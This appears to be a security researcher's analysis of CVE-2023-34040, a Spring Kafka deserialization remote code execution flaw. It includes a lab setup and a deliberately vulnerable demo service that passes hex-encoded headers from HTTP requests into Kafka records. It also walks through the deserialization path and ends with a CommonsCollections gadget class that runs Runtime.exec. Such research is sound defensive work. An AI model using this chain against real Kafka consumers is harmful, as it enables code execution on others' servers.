CVE-2023-34040 Spring Kafka Deserialization Remote Code Execution

0x01 Preface

Here is the explicit description about Spring Kafka deserialization vulnerability in Vmware security bulletin.

upload successful

Reference

https://spring.io/security/cve-2023-34040

According to the description in security bulletin, we can simply attain some critical points resulting in the vulnerability.

  1. Setting the ErrorHandlingDeserializer as a key and/or value in the Kafka record in configuration.

  2. Setting the boolean type properties checkDeserExWhenKeyNull and/or checkDeserExWhenValueNull to true.

  3. The users can publish a Kafka topic without any verification.

0x02 Concepts of Kafka

Before deeply diving into the vulnerability, we promptly review some relevant concepts of the Kafka service.

img

  • Producer:we call the object for publishing record Kafka topic producer

  • Topic:The records are classified by the Kafka service, and each classification is named Topic.

  • Broker:The published messages are stored in a group of servers, we call it Kafka cluster. Each of the server is a Broker. The consumer can attain the data form Broker and consume more than one topic.
  • Consumer:The object which is used to subscribe message and handle with the published message is called Kafka topi consumer. The consumption messages are topic based.

Moreover,it is necessary to review the structure of Kafka record.

upload successful

Kafka Record, we also call it Message or Event consisting of Header and Body. The header data virtually equals to Metadata including the basic elements like Topic, Patition and Timestamp. They are stored as a pair of key/value. The body data usually are the relevant business data stored as key/value constructure as well.

Preparation

Zookeeper server is required before deploying Kafka service.

1.Installing Zookeeper server by docker

1
docker run -d --name zookeeper -p 2181:2181 -t zookeeper:latest

2.Deploying Kafka server by docker

1
2
3
4
5
6
docker run  -d --name kafka -p 9092:9092 \
-e KAFKA_ZOOKEEPER_CONNECT=192.168.5.102:2181 \
-e KAFKA_ADVERTISED_LISTENERS=PLAINTEXT://192.168.5.102:9092 \
-e KAFKA_LISTENERS=PLAINTEXT://0.0.0.0:9092 \
-e TZ="Asia/Shanghai" \
wurstmeister/kafka:latest

3.Spring Boot project imports the affected Kafka dependencies

Affected version:

  • 2.8.1 to 2.9.10
  • 3.0.0 to 3.0.9
1
2
3
4
5
<dependency>
<groupId>org.springframework.kafka</groupId>
<artifactId>spring-kafka</artifactId>
<version>2.8.11</version>
</dependency>

4.Updating the configuration in application.yaml

upload successful

5.Classes for demonstration

1)Kafka Producer Class

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
package com.example.SpringKafkaDemo.producer;

import com.example.SpringKafkaDemo.model.KafkaMessage;
import org.apache.kafka.clients.producer.ProducerRecord;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.kafka.core.KafkaTemplate;
import org.springframework.web.bind.annotation.*;

import java.util.HashMap;

@RestController
public class KafkaProducer {

@Autowired
private KafkaTemplate<String, String> kafkaTemplate;

@PostMapping("/message/send")
public String sendMessage(@RequestBody KafkaMessage message) {

String topic = message.getTopic();
String data = message.getData();

HashMap<String, String> headers = message.getHeaders();


ProducerRecord<String, String> producerRecord = new ProducerRecord<>(topic, data);
for (String s : headers.keySet()) {
if (s.equals("springDeserializerExceptionKey")) {
String exceptData = headers.get(s);
byte[] exceptHandler = KafkaProducer.hexStringtoBytes(exceptData);
producerRecord.headers().add(s, exceptHandler);
continue;
}

producerRecord.headers().add(s, headers.get(s).getBytes());
}
kafkaTemplate.send(producerRecord);
String jsonString="{\"code\":\"200\", \"status\":\"success\"}";

return jsonString;
}


private static byte[] hexStringtoBytes(String hexString) {

byte[] excepetionMessage = new byte[hexString.length() / 2];
for (int i = 0; i < excepetionMessage.length; i++) {
excepetionMessage[i] = (byte) Integer.parseInt(hexString.substring(i * 2, i * 2 + 2), 16);

}
return excepetionMessage;
}
}

By the way, here we use a type of design pattern in Java Language, Template Method Pattern. In this demonstration, I insert a template named kafkaTemplate.

Highlight of the code fragment

1
private KafkaTemplate<String, String> kafkaTemplate;

2)Kafka Consumer Class

1
2
3
4
5
6
7
8
9
10
11
12
13
14
package com.example.SpringKafkaDemo.consumer;

import org.springframework.kafka.annotation.KafkaListener;
import org.springframework.stereotype.Service;

@Service
public class KafkaConsumer {

@KafkaListener(topics = "my-topic", groupId = "my-group-id")
public void consume(String message) {
System.out.println("Received message: " + message);
}

}

3)Config Class for the Consumer

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
package com.example.SpringKafkaDemo.config;

import org.apache.kafka.clients.consumer.ConsumerConfig;
import org.springframework.beans.factory.annotation.Value;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.kafka.annotation.EnableKafka;
import org.springframework.kafka.config.ConcurrentKafkaListenerContainerFactory;
import org.springframework.kafka.core.ConsumerFactory;
import org.springframework.kafka.core.DefaultKafkaConsumerFactory;
import org.springframework.kafka.support.serializer.JsonDeserializer;

import java.util.HashMap;
import java.util.Map;

@Configuration
@EnableKafka
public class KafkaConsumerConfig {

@Value("${spring.kafka.bootstrap-servers}")
private String bootstrapServers;

@Value("${spring.kafka.consumer.group-id}")
private String groupId;

@Bean
public Map<String, Object> consumerConfigs() {
Map<String, Object> props = new HashMap<>();
props.put(ConsumerConfig.BOOTSTRAP_SERVERS_CONFIG, bootstrapServers);
props.put(ConsumerConfig.GROUP_ID_CONFIG, groupId);
props.put(ConsumerConfig.AUTO_OFFSET_RESET_CONFIG, "earliest");
props.put(ConsumerConfig.KEY_DESERIALIZER_CLASS_CONFIG, JsonDeserializer.class);
props.put(ConsumerConfig.VALUE_DESERIALIZER_CLASS_CONFIG, JsonDeserializer.class);
return props;
}

@Bean
public ConsumerFactory<String, String> consumerFactory() {
return new DefaultKafkaConsumerFactory<>(consumerConfigs());
}

@Bean
public ConcurrentKafkaListenerContainerFactory<String, String> kafkaListenerContainerFactory() {
ConcurrentKafkaListenerContainerFactory<String, String> factory = new ConcurrentKafkaListenerContainerFactory<>();
factory.setConsumerFactory(consumerFactory());
factory.getContainerProperties().setCheckDeserExWhenKeyNull(true);
factory.getContainerProperties().setCheckDeserExWhenValueNull(true);
return factory;
}
}

In acordance with the vulnerablity description in official bulletin, we should set both the checkDeserExWhenKeyNull and checkDeserExWhenValueNull properties to true.

1
2
factory.getContainerProperties().setCheckDeserExWhenKeyNull(true)
factory.getContainerProperties().setCheckDeserExWhenValueNull(true)

Se the breakpoint at the getExceptionFromHeader function and then have the server start.

upload successful

Step into invokeIfHaveRecords function, the record object will be deserialized.

upload successful

upload successful

Back to the getExceptionFromHeader function.

upload successful

This function makes the value springDeserializerExceptionKey of record.headers() into the the value of the variables headerName and be delivered header.

And then deliver the value to byteArrayToDeserializationException function.

upload successful

Step into byteArrayToDeserializationException function.

upload successful

The resolveClass function is overrided to restrain arbitrary Java class deserialization. Actually, we can find the way of preventing Java deserialization vulnerability in many projects, like Apache Shiro, Fastjson.

upload successful

Apparently, only the class
org.springframework.kafka.support.serializer.DeserializationException can be deserialized.

upload successful

Step into DeserializationException function, it consists four arguments. One of them is cause which is used to invoke instantial class.

upload successful

Write a malicious class and make it inherit the parent class Throwable.

upload successful

Eventually, fill the value of the springDeserializerExceptionKey key in JSON data with the generated Java serialization. The remote code execution is trigged after sending the HTTP request.

upload successful

In addition, we could exploit CommonsCollections gadget as well. Thus, the malicious class could be constructed as follow.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
package org.example.deserialization;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.util.HashMap;
import java.util.Map;

public class CustomExceptionClass extends Throwable {

// CommonCollection6 Gadget in Static Code Block

static {
Transformer[] transformers=new Transformer[]{
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod",
new Class[]{String.class, Class[].class},
new Object[]{"getRuntime", new Class[0]}),
new InvokerTransformer("invoke",
new Class[]{Object.class, Object[].class},
new Object[]{null, new Object[0]}),
new InvokerTransformer("exec",
new Class[]{String.class},
new Object[]{"open -a calculator"})
};

Map<String, String> innerMap= new HashMap<>();
innerMap.put("key","value");

Map<String, String> outerMap = TransformedMap.decorate(
innerMap,
null,
new ChainedTransformer(transformers));

outerMap.put("topic", "test");

}
}

Proof of Content

https://github.com/pyn3rd/CVE-2023-34040